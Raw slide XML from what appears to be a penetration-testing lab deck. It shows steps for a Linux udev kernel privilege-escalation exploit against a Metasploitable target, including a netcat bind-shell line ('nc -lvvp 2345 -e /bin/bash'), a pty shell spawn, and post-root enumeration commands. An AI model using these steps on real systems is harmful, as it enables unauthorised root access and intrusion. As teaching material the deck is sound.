                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>to PID of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>udevd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. It’s the only non-zero number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097494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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nano run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>and add below lines in the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc -lvvp 2345 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0"/>
              <a:t>Go back to to home path and run the exploit with the PID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_PID_number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Open a new tab and connect to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>binded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> shell with Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> (the port number you put in the run file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -c "import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('/bin/bash’)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> to see if you got the root access, (you can see it in the terminal but still)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1170643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After gaining root access…</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Now you got the access to your victim, what should you look for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> distribution type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat /proc/version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> | grep Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> kernel version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> environmental variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Application &amp; services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> aux | grep root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> services running in root, top  currently running services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/bin/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> what applications are installed , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> more info; version, description..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> which jobs are scheduled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1620375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After gaining root access…</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Communications &amp; networking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> other users and hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Confidential information &amp; users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
